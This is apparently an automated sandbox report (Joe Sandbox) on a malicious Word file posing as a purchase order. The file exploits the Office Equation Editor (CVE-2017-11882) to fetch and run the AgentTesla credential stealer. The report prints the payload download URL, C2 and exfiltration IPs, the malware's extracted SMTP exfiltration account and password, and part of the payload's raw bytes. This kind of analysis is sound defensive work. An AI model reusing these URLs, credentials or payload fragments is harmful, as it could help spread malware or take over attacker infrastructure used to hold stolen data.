Play interactive tour

Edit tour

Analysis Report Revised Purchase Order 1214.doc

Overview

General Information

Sample Name:	Revised Purchase Order 1214.doc
Analysis ID:	349841
MD5:	4b6b36751c6b94190a4ffd8cf8859758
SHA1:	b1771187bcd8c9dc333b90131acd3a71e315c111
SHA256:	ea6269300a84f6764e771f3c560da1a639272149302d51a1e31bbee034691944
Tags:	doc
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Scheduled temp file as task from temp location

Yara detected AgentTesla

Yara detected AntiVM_3

.NET source code contains very large array initializations

C2 URLs / IPs found in malware configuration

Contains functionality to register a low level keyboard hook

Injects a PE file into a foreign processes

Installs a global keyboard hook

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Uses schtasks.exe or at.exe to add and modify task schedules

Adds / modifies Windows certificates

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

PE file contains executable resources (Code or Archives)

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 1492 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 2512 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

pridingnsjhfhdjs.exe (PID: 260 cmdline: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe MD5: CEDD3570A65CE74199167DA6E5190CC4)

schtasks.exe (PID: 2916 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\DsVdJeRPpef' /XML 'C:\Users\user\AppData\Local\Temp\tmp40B9.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

pridingnsjhfhdjs.exe (PID: 912 cmdline: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe MD5: CEDD3570A65CE74199167DA6E5190CC4)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "gIf7Ulq0jmX9J", "URL: ": "https://l76BkUNIC14JIoEXp.org", "To: ": "mrst@mrst-kr.icu", "ByHost: ": "mail.privateemail.com:587", "Password: ": "3PAeGPRhRXRtk", "From: ": "mrst@mrst-kr.icu"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.2395069927.000000000239D000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2395069927.000000000239D000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2394346599.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2395457752.00000000026F7000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2395457752.00000000026F7000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2139955625.0000000002471000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2140668644.0000000003479000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.2139978034.000000000249C000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: pridingnsjhfhdjs.exe PID: 260	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: pridingnsjhfhdjs.exe PID: 260	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: pridingnsjhfhdjs.exe PID: 912	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: pridingnsjhfhdjs.exe PID: 912	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author
7.2.pridingnsjhfhdjs.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.pridingnsjhfhdjs.exe.372b0d0.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.pridingnsjhfhdjs.exe.3688e80.6.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.pridingnsjhfhdjs.exe.372b0d0.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.pridingnsjhfhdjs.exe.2481d30.3.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
4.2.pridingnsjhfhdjs.exe.2501288.4.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe, CommandLine: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe, NewProcessName: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe, OriginalFileName: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2512, ProcessCommandLine: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe, ProcessId: 260

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 43.252.37.193, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2512, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2512, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\TrC86HH4pxVZ49N[1].exe

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\DsVdJeRPpef' /XML 'C:\Users\user\AppData\Local\Temp\tmp40B9.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\DsVdJeRPpef' /XML 'C:\Users\user\AppData\Local\Temp\tmp40B9.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe, ParentImage: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe, ParentProcessId: 260, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\DsVdJeRPpef' /XML 'C:\Users\user\AppData\Local\Temp\tmp40B9.tmp', ProcessId: 2916

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: pridingnsjhfhdjs.exe.912.7.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "gIf7Ulq0jmX9J", "URL: ": "https://l76BkUNIC14JIoEXp.org", "To: ": "mrst@mrst-kr.icu", "ByHost: ": "mail.privateemail.com:587", "Password: ": "3PAeGPRhRXRtk", "From: ": "mrst@mrst-kr.icu"}

Multi AV Scanner detection for domain / URL

Show sources

Source: globalteamacademy.com

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: Revised Purchase Order 1214.doc	Virustotal: Detection: 45%			Perma Link
Source: Revised Purchase Order 1214.doc	ReversingLabs: Detection: 42%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 4x nop then jmp 0033DD24h	4_2_0033D875
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 4x nop then jmp 0033DD24h	4_2_0033D2FF
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 4x nop then jmp 0033DD24h	4_2_0033D3BD
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 4x nop then jmp 00331781h	4_2_00330EA8
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	4_2_0033E010
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	4_2_0033E001
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 4x nop then jmp 0033DD24h	4_2_0033D858
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	4_2_0033DF50

Source: global traffic

DNS query: name: globalteamacademy.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 43.252.37.193:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 43.252.37.193:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://l76BkUNIC14JIoEXp.org

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 198.54.122.60:587

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 08 Feb 2021 09:28:20 GMTServer: ApacheLast-Modified: Mon, 08 Feb 2021 03:31:11 GMTAccept-Ranges: bytesContent-Length: 734720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8a af 20 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 20 0b 00 00 14 00 00 00 00 00 00 3e 3e 0b 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 3d 0b 00 57 00 00 00 00 40 0b 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 1e 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 12 00 00 00 40 0b 00 00 12 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 34 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 3e 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 88 24 0a 00 5c 19 01 00 03 00 00 00 01 00 00 06 28 e1 00 00 60 43 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 01 00 00 0a 28 02 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 03 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 07 00 00 0a 00 02 16 28 08 00 00 0a 00 02 17 28 09 00 00 0a 00 02 17 28 0a 00 00 0a 00 02 16 28 0b 00 00 0a 00 2a 00 4e 00 02 28 09 00 00 06 6f 16 00 00 06 28 0d 00 00 0a 00 2a 26 00 02 28 0f 00 00 0a 00 2a 00 00 ce 73 10 00 00 0a 80 01 00 00 04 73 11 00 00 0a 80 02 00 00 04 73 12 00 00 0a 80 03 00 00 04 73 13 00 00 0a 80 04 00 00 04 73 14 00 00 0a 80 05 00 00 04 2a 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 15 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 16 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 17 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 18 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f

Source: Joe Sandbox View	IP Address: 43.252.37.193 43.252.37.193
Source: Joe Sandbox View	IP Address: 198.54.122.60 198.54.122.60

Source: Joe Sandbox View

ASN Name: NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 198.54.122.60:587

Source: global traffic

HTTP traffic detected: GET /showcase/pal/TrC86HH4pxVZ49N.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: globalteamacademy.comConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8ADBC433-349E-46EF-BF24-C3A751787722}.tmp

Jump to behavior

Source: global traffic

Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: globalteamacademy.com

Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp	String found in binary or memory: http://Gspsks.com
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmp	String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chamber
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chamb
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394540073.000000000052E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrusm
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2395251987.0000000002530000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: pridingnsjhfhdjs.exe, 00000007.00000003.2229427814.00000000062C1000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/tru
Source: pridingnsjhfhdjs.exe, 00000007.00000003.2230027744.00000000062C1000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.7.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394491408.00000000004BD000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab&
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394540073.000000000052E000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enMD
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2395251987.0000000002530000.00000004.00000001.sdmp	String found in binary or memory: http://mail.privateemail.com
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2395251987.0000000002530000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: pridingnsjhfhdjs.exe, 00000004.00000002.2144136289.00000000054C0000.00000002.00000001.sdmp, pridingnsjhfhdjs.exe, 00000007.00000002.2397057419.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: pridingnsjhfhdjs.exe, 00000004.00000002.2139955625.0000000002471000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401524278.00000000081A0000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: pridingnsjhfhdjs.exe, 00000004.00000002.2144136289.00000000054C0000.00000002.00000001.sdmp, pridingnsjhfhdjs.exe, 00000007.00000002.2397057419.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org/doc0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.ancert.com/cps0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.certifikat.dk/repository0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-me.lv/repository0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.firmaprofesional.com0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.ssc.lt/cps03
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmp	String found in binary or memory: https://ca.sia.it/secclu
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2395544737.00000000027B7000.00000004.00000001.sdmp, pridingnsjhfhdjs.exe, 00000007.00000002.2395494768.0000000002749000.00000004.00000001.sdmp, pridingnsjhfhdjs.exe, 00000007.00000002.2395069927.000000000239D000.00000004.00000001.sdmp, pridingnsjhfhdjs.exe, 00000007.00000002.2395457752.00000000026F7000.00000004.00000001.sdmp	String found in binary or memory: https://l76BkUNIC14JIoEXp.org
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2395251987.0000000002530000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: pridingnsjhfhdjs.exe	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook

Show sources

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

Code function: 7_2_00A47150 SetWindowsHookExW 0000000D,00000000,?,?

7_2_00A47150

Installs a global keyboard hook

Show sources

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary:

.NET source code contains very large array initializations

Show sources

Source: 7.2.pridingnsjhfhdjs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE6ADD9C3u002d899Au002d4BECu002dBDE6u002d6DA676D3EF08u007d/u0037A14B8E8u002dCE6Cu002d4FA1u002dB56Cu002dC13370123E47.cs

Large array initialization: .cctor: array initializer size 11931

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\TrC86HH4pxVZ49N[1].exe			Jump to dropped file

